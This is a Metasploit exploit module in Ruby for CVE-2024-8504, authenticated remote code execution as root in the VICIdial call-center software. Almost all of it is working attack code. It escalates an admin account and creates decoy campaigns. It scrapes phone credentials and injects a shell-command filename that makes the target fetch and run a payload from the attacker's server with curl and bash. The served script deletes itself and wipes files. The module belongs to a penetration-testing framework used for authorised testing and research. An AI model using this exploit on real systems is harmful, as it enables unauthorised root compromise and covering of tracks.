## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer prepend Msf::Exploit::Remote::AutoCheck Rank = ExcellentRanking def initialize(info = {}) super( update_info( info, 'Name' => 'VICIdial Authenticated Remote Code Execution', 'Description' => %q{ An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective. }, 'Author' => [ 'Valentin Lobstein', # Metasploit Module 'Jaggar Henry of KoreLogic, Inc.' # Vulnerability Discovery ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2024-8504'], ['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt'] ], 'DisclosureDate' => '2024-09-10', 'Platform' => %w[unix linux], 'Arch' => %w[ARCH_CMD], 'Targets' => [ [ 'Unix/Linux Command Shell', { 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD, 'Privileged' => true # tested with cmd/linux/http/x64/meterpreter/reverse_tcp } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'WfsDelay' => 300, 'SRVPORT' => 5000 # To not have conflict with FETCH_SRVPORT (both are needed for this exploit to work) }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION] } ) ) register_options([ OptString.new('USERNAME', [true, 'Administrator username']), OptString.new('PASSWORD', [true, 'Administrator password']), ]) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vicidial.php'), 'method' => 'GET' }) return CheckCode::Unknown unless res&.code == 200 html_doc = res.get_html_document version_info = html_doc.at_xpath("//td[contains(text(), 'VERSION:')]")&.text || res.body.split("\n").find { |line| line.include?('VERSION:') } return CheckCode::Unknown unless version_info extracted_version = version_info.scan(/VERSION:\s*(\d+\.\d+)-(\d+)/).flatten.join('-') return CheckCode::Unknown if extracted_version.empty? print_status("VICIdial version: #{extracted_version}") vulnerable_version = Rex::Version.new('2.14-917a') current_version = Rex::Version.new(extracted_version) return current_version <= vulnerable_version ? CheckCode::Vulnerable : CheckCode::Safe end def exploit # Start the HTTP server to handle incoming requests from the payload start_service print_status('Server started.') # Add the resource to serve the payload and prepare the listener primer # Authenticate as an administrator using provided credentials target_uri, request_headers = authenticate_admin # Elevate user privileges by updating user settings update_user_settings(target_uri, request_headers) # Update the system settings for further exploitation update_system_settings(target_uri, request_headers) # Create a dummy campaign to act as a decoy during the attack fake_company_name, fake_campaign_id, fake_list_id, fake_list_name = create_dummy_campaign(target_uri, request_headers) # Modify the settings of the newly created dummy campaign update_campaign_settings(target_uri, request_headers, fake_company_name, fake_campaign_id) # Create a dummy list associated with the dummy campaign create_dummy_list(target_uri, request_headers, fake_list_name, fake_campaign_id, fake_list_id) # Retrieve phone credentials (extension and password) to authenticate as an agent phone_extension, phone_password, recording_extension = fetch_phone_credentials(target_uri, request_headers) # Authenticate to the agent portal using the retrieved phone credentials and campaign ID session_name, session_id = agent_portal_authentication(request_headers, phone_extension, phone_password, fake_campaign_id) # Insert a malicious recording that contains the payload, using the agent session insert_malicious_recording(request_headers, session_name, session_id, recording_extension) # Clean up by deleting the campaign created earlier delete_dummy_campaign(target_uri, request_headers, fake_campaign_id) # Start the cron job to execute the malicious payload wait_for_cron_job end def primer add_resource('Path' => '/', 'Proc' => proc { |cli, req| on_request_uri_payload(cli, req) }) print_status('Payload is ready at /') end def on_request_uri_payload(cli, request) bash_command = <<-BASH #!/bin/bash rm -- $(readlink /proc/$$/fd/255) cd /var/spool/asterisk/monitor/ #{payload.encoded} find . -maxdepth 1 -type f -delete BASH handle_request(cli, request, bash_command) end def handle_request(cli, request, response_payload) print_status("Received request at: #{request.uri} - Client Address: #{cli.peerhost}") case request.uri when '/' print_status("Sending response to #{cli.peerhost} for /") send_response(cli, response_payload) else print_error("Request for unknown resource: #{request.uri}") send_not_found(cli) end end def delete_dummy_campaign(target_uri, request_headers, campaign_id) print_status("Deleting dummy campaign with ID: #{campaign_id}") res = send_request_cgi({ 'uri' => normalize_uri(target_uri, 'vicidial', 'admin.php'), 'method' => 'GET', 'vars_get' => { 'ADD' => '61', 'campaign_id' => campaign_id, 'CoNfIrM' => 'YES' }, 'headers' => request_headers }) res&.code == 200 ? print_good("Campaign #{campaign_id} deleted successfully.") : print_error("Failed to delete campaign #{campaign_id}.") end def authenticate_admin username = datastore['USERNAME'] password = datastore['PASSWORD'] credentials = "#{username}:#{password}" credentials_base64 = Rex::Text.encode_base64(credentials) auth_header = "Basic #{credentials_base64}" target_uri = normalize_uri(datastore['TARGETURI'], 'vicidial', 'admin.php') request_params = { 'ADD' => '3', 'user' => username } request_headers = { 'Authorization' => auth_header } res = send_request_cgi( 'uri' => target_uri, 'method' => 'GET', 'vars_get' => request_params, 'headers' => request_headers, 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Failed to authenticate with credentials. Maybe hashing is enabled?') unless res&.code == 200 print_good("Authenticated successfully as user '#{username}'") [target_uri, request_headers] end def update_user_settings(target_uri, request_headers) faker = Faker::Internet user_settings_body = { 'ADD' => '4A', 'custom_fields_modify' => '0', 'user' => datastore['USERNAME'], 'DB' => '0', 'pass' => datastore['PASSWORD'], 'force_change_password' => 'N', 'full_name' => Faker::Name.name, 'user_level' => '9', 'user_group' => 'ADMIN', 'phone_login' => faker.username, 'phone_pass' => faker.password, 'active' => 'Y', 'user_new_lead_limit' => '-1', 'agent_choose_ingroups' => '1', 'agent_choose_blended' => '1', 'hotkeys_active' => '0', 'scheduled_callbacks' => '1', 'agentonly_callbacks' => '0', 'next_dial_my_callbacks' => 'NOT_ACTIVE', 'agentcall_manual' => '0', 'manual_dial_filter' => 'DISABLED', 'agentcall_email' => '0', 'agentcall_chat' => '0', 'vicidial_recording' => '1', 'vicidial_transfers' => '1', 'closer_default_blended' => '0', 'user_choose_language' => '0', 'selected_language' => 'default+English', 'vicidial_recording_override' => 'DISABLED', 'mute_recordings' => 'DISABLED', 'alter_custdata_override' => 'NOT_ACTIVE', 'alter_custphone_override' => 'NOT_ACTIVE', 'agent_shift_enforcement_override' => 'ALL', 'agent_call_log_view_override' => 'Y', 'hide_call_log_info' => 'Y', 'agent_lead_search' => 'NOT_ACTIVE', 'lead_filter_id' => 'NONE', 'user_hide_realtime' => '0', 'allow_alerts' => '0', 'preset_contact_search' => 'NOT_ACTIVE', 'max_inbound_calls' => '0', 'max_inbound_filter_enabled' => '0', 'max_inbound_filter_min_sec' => '-1', 'inbound_credits' => '-1', 'max_hopper_calls' => '0', 'max_hopper_calls_hour' => '0', 'wrapup_seconds_override' => '-1', 'ready_max_logout' => '-1', 'RANK_AGENTDIRECT' => '0', 'GRADE_AGENTDIRECT' => '10', 'LIMIT_AGENTDIRECT' => '-1', 'RANK_AGENTDIRECT_CHAT' => '0', 'GRADE_AGENTDIRECT_CHAT' => '10', 'LIMIT_AGENTDIRECT_CHAT' => '-1', 'qc_enabled' => '0', 'qc_user_level' => '1', 'qc_pass' => '0', 'qc_finish' => '0', 'qc_commit' => '0', 'hci_enabled' => '0', 'realtime_block_user_info' => '0', 'admin_hide_lead_data' => '0', 'admin_hide_phone_data' => '0', 'ignore_group_on_search' => '0', 'view_reports' => '1', 'access_recordings' => '0', 'alter_agent_interface_options' => '1', 'modify_users' => '1', 'change_agent_campaign' => '1', 'delete_users' => '1', 'modify_usergroups' => '1', 'delete_user_groups' => '1', 'modify_lists' => '1', 'delete_lists' => '1', 'load_leads' => '1', 'modify_leads' => '1', 'export_gdpr_leads' => '0', 'download_lists' => '1', 'export_reports' => '1', 'delete_from_dnc' => '1', 'modify_campaigns' => '1', 'campaign_detail' => '1', 'modify_dial_prefix' => '1', 'delete_campaigns' => '1', 'modify_ingroups' => '1', 'delete_ingroups' => '1', 'modify_inbound_dids' => '1', 'delete_inbound_dids' => '1', 'modify_custom_dialplans' => '1', 'modify_remoteagents' => '1', 'delete_remote_agents' => '1', 'modify_scripts' => '1', 'delete_scripts' => '1', 'modify_filters' => '1', 'delete_filters' => '1', 'ast_admin_access' => '1', 'ast_delete_phones' => '1', 'modify_call_times' => '1', 'delete_call_times' => '1', 'modify_servers' => '1', 'modify_shifts' => '1', 'modify_phones' => '1', 'modify_carriers' => '1', 'modify_email_accounts' => '0', 'modify_labels' => '1', 'modify_colors' => '1', 'modify_languages' => '0', 'modify_statuses' => '1', 'modify_voicemail' => '1', 'modify_audiostore' => '1', 'modify_moh' => '1', 'modify_tts' => '1', 'modify_contacts' => '1', 'callcard_admin' => '1', 'modify_auto_reports' => '0', 'add_timeclock_log' => '1', 'modify_timeclock_log' => '1', 'delete_timeclock_log' => '1', 'manager_shift_enforcement_override' => '1', 'pause_code_approval' => '1', 'admin_cf_show_hidden' => '0', 'modify_ip_lists' => '0', 'ignore_ip_list' => '0', 'two_factor_override' => 'NOT_ACTIVE', 'vdc_agent_api_access' => '1', 'api_list_restrict' => '0', 'api_allowed_functions%5B%5D' => 'ALL_FUNCTIONS', 'api_only_user' => '0', 'modify_same_user_level' => '1', 'download_invalid_files' => '1', 'alter_admin_interface_options' => '1', 'SUBMIT' => 'SUBMIT' } send_request_cgi( 'uri' => target_uri, 'method' => 'POST', 'headers' => request_headers, 'vars_post' => user_settings_body, 'keep_cookies' => true ) print_good('Updated user settings to increase privileges') end def update_system_settings(target_uri, request_headers) res = send_request_cgi( 'uri' => target_uri, 'method' => 'GET', 'headers' => request_headers, 'vars_get' => { 'ADD' => Rex::Text.rand_text_numeric(10, 15) }, 'keep_cookies' => true ) fail_with(Failure::NotFound, 'Failed to fetch system settings') unless res system_settings_body = {} res.get_html_document.css('input').each do |input_tag| system_settings_body[input_tag['name']] = input_tag['value'] end res.get_html_document.css('select').each do |select_tag| selected_tag = select_tag.at_css('option[selected]') next unless selected_tag system_settings_body[select_tag['name']] = selected_tag.text end system_settings_body['outbound_autodial_active'] = '0' send_request_cgi( 'uri' => target_uri, 'method' => 'POST', 'headers' => request_headers, 'vars_post' => system_settings_body, 'keep_cookies' => true ) print_good('Updated system settings') end def create_dummy_campaign(target_uri, request_headers) fake_company_name = Faker::Company.name fake_campaign_id = Faker::Number.number(digits: 6).to_i fake_list_id = fake_campaign_id + 1 fake_list_name = "#{fake_company_name} List" campaign_settings_body = { 'ADD' => '21', 'campaign_id' => fake_campaign_id, 'campaign_name' => fake_company_name, 'user_group' => '---ALL---', 'active' => 'Y', 'allow_closers' => 'Y', 'hopper_level' => '1', 'next_agent_call' => 'random', 'local_call_time' => '12am-12am', 'get_call_launch' => 'NONE', 'SUBMIT' => 'SUBMIT' } send_request_cgi( 'uri' => target_uri, 'method' => 'POST', 'headers' => request_headers, 'vars_post' => campaign_settings_body, 'keep_cookies' => true ) print_good("Created dummy campaign '#{fake_company_name}'") [fake_company_name, fake_campaign_id, fake_list_id, fake_list_name] end def update_campaign_settings(target_uri, request_headers, fake_company_name, fake_campaign_id) update_campaign_body = { 'ADD' => '41', 'campaign_id' => fake_campaign_id, 'old_campaign_allow_inbound' => 'Y', 'campaign_name' => fake_company_name, 'active' => 'Y', 'lead_order' => 'DOWN', 'lead_filter_id' => 'NONE', 'no_hopper_leads_logins' => 'Y', 'hopper_level' => '1', 'reset_hopper' => 'N', 'dial_method' => 'RATIO', 'auto_dial_level' => '1', 'SUBMIT' => 'SUBMIT', 'form_end' => 'END' } send_request_cgi( 'uri' => target_uri, 'method' => 'POST', 'headers' => request_headers, 'vars_post' => update_campaign_body, 'keep_cookies' => true ) print_good('Updated dummy campaign settings') end def create_dummy_list(target_uri, request_headers, fake_list_name, fake_campaign_id, fake_list_id) list_settings_body = { 'ADD' => '211', 'list_id' => fake_list_id, 'list_name' => fake_list_name, 'campaign_id' => fake_campaign_id, 'active' => 'Y', 'SUBMIT' => 'SUBMIT' } send_request_cgi( 'uri' => target_uri, 'method' => 'POST', 'headers' => request_headers, 'vars_post' => list_settings_body, 'keep_cookies' => true ) print_good("Created dummy list '#{fake_list_name}' for campaign '#{fake_campaign_id}'") end def fetch_phone_credentials(target_uri, request_headers) res = send_request_cgi( 'uri' => target_uri, 'method' => 'GET', 'headers' => request_headers, 'vars_get' => { 'ADD' => '10000000000' }, 'keep_cookies' => true ) fail_with(Failure::NotFound, 'Failed to fetch phone credentials') unless res phone_uri_path = res.get_html_document.at_css('a:contains("MODIFY")')&.get_attribute('href') fail_with(Failure::NotFound, 'Failed to find the "MODIFY" link in the phone credentials page') unless phone_uri_path res = send_request_cgi( 'uri' => normalize_uri(datastore['TARGETURI'], phone_uri_path), 'method' => 'GET', 'headers' => request_headers, 'keep_cookies' => true ) fail_with(Failure::NotFound, 'Failed to fetch phone credentials page') unless res phone_extension = res.get_html_document.at_css('input[name="extension"]')&.get_attribute('value') phone_password = res.get_html_document.at_css('input[name="pass"]')&.get_attribute('value') recording_extension = res.get_html_document.at_css('input[name="recording_exten"]')&.get_attribute('value') if [phone_extension, phone_password, recording_extension].all? print_good("Found phone credentials: Extension=#{phone_extension}, Password=#{phone_password}, Recording Extension=#{recording_extension}") else fail_with(Failure::NotFound, 'Failed to retrieve one or more phone credentials from the page') end [phone_extension, phone_password, recording_extension] end def agent_portal_authentication(request_headers, phone_extension, phone_password, fake_campaign_id) vdc_db_query_body = { 'user' => datastore['USERNAME'], 'pass' => datastore['PASSWORD'], 'ACTION' => 'LogiNCamPaigns', 'format' => 'html' } res = send_request_cgi( 'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vdc_db_query.php'), 'method' => 'POST', 'vars_post' => vdc_db_query_body, 'keep_cookies' => true ) fail_with(Failure::NotFound, 'Failed to retrieve hidden input fields') unless res doc = res.get_html_document mgr_login_name = doc.at_css('input[name^="MGR_login"]')&.get_attribute('name') mgr_pass_name = doc.at_css('input[name^="MGR_pass"]')&.get_attribute('name') if mgr_login_name && mgr_pass_name print_good("Retrieved dynamic field names: #{mgr_login_name}, #{mgr_pass_name}") else begin today_date = Time.now.strftime('%Y%m%d') mgr_login_name = "MGR_login#{today_date}" mgr_pass_name = "MGR_pass#{today_date}" print_status("Constructed dynamic field names manually: #{mgr_login_name}, #{mgr_pass_name}") end end manager_login_body = { 'DB' => '0', 'JS_browser_height' => '1313', 'JS_browser_width' => '2560', 'phone_login' => phone_extension, 'phone_pass' => phone_password, 'VD_login' => datastore['USERNAME'], 'VD_pass' => datastore['PASSWORD'], 'MGR_override' => '1', 'relogin' => 'YES', mgr_login_name => datastore['USERNAME'], mgr_pass_name => datastore['PASSWORD'], 'SUBMIT' => 'SUBMIT' } send_request_cgi( 'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vicidial.php'), 'method' => 'POST', 'headers' => request_headers, 'vars_post' => manager_login_body, 'keep_cookies' => true ) print_good('Entered "manager" credentials to override shift enforcement') agent_login_body = { 'DB' => '0', 'JS_browser_height' => '1313', 'JS_browser_width' => '2560', 'phone_login' => phone_extension, 'phone_pass' => phone_password, 'VD_login' => datastore['USERNAME'], 'VD_pass' => datastore['PASSWORD'], 'VD_campaign' => fake_campaign_id } res = send_request_cgi( 'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vicidial.php'), 'method' => 'POST', 'headers' => request_headers, 'vars_post' => agent_login_body ) print_good('Authenticated as agent using phone credentials') session_name_match = res.body.match(/var\s+session_name\s*=\s*'([a-zA-Z0-9_]+)';/) session_id_match = res.body.match(/var\s+session_id\s*=\s*'([0-9]+)';/) if session_name_match && session_id_match session_name = session_name_match[1] session_id = session_id_match[1] print_good("Session Name: #{session_name}, Session ID: #{session_id}") else fail_with(Failure::NotFound, 'Failed to retrieve session information') end [session_name, session_id] end def insert_malicious_recording(request_headers, session_name, session_id, recording_extension) uri = get_uri.gsub(%r{^https?://}, '').chomp('/') random_filename = ".#{Rex::Text.rand_text_alphanumeric(rand(3..5))}" malicious_filename = "$(curl$IFS-k$IFS@#{uri}$IFS-o$IFS#{random_filename}&&bash$IFS#{random_filename})" print_status("Generated malicious command: #{malicious_filename}") record1_body = { 'server_ip' => datastore['RHOSTS'], 'session_name' => session_name, 'user' => datastore['USERNAME'], 'pass' => datastore['PASSWORD'], 'ACTION' => 'MonitorConf', 'format' => 'text', 'channel' => "Local/#{recording_extension}@default", 'filename' => malicious_filename, 'exten' => recording_extension, 'ext_context' => 'default', 'ext_priority' => '1', 'FROMvdc' => 'YES', 'FROMapi' => '' } res = send_request_cgi( 'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'manager_send.php'), 'method' => 'POST', 'headers' => request_headers, 'vars_post' => record1_body, 'keep_cookies' => true ) recording_id_match = res.body.match(/RecorDing_ID: ([0-9]+)/) if recording_id_match recording_id = recording_id_match[1] print_status(res.body) else fail_with(Failure::Unknown, 'Failed to get recording ID') end record2_body = { 'server_ip' => datastore['RHOSTS'], 'session_name' => session_name, 'user' => datastore['USERNAME'], 'pass' => datastore['PASSWORD'], 'ACTION' => 'StopMonitorConf', 'format' => 'text', 'channel' => "Local/#{recording_extension}@default", 'filename' => "ID:#{recording_id}", 'exten' => session_id, 'ext_context' => 'default', 'ext_priority' => '1', 'FROMvdc' => 'YES', 'FROMapi' => '' } send_request_cgi( 'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'conf_exten_check.php'), 'method' => 'POST', 'headers' => request_headers, 'vars_post' => record2_body, 'keep_cookies' => true ) print_good('Stopped malicious recording to prevent file size from growing') end def wait_for_cron_job print_status("Waiting for #{datastore['WfsDelay']} seconds to allow the cron job to execute the payload...") service.wait end end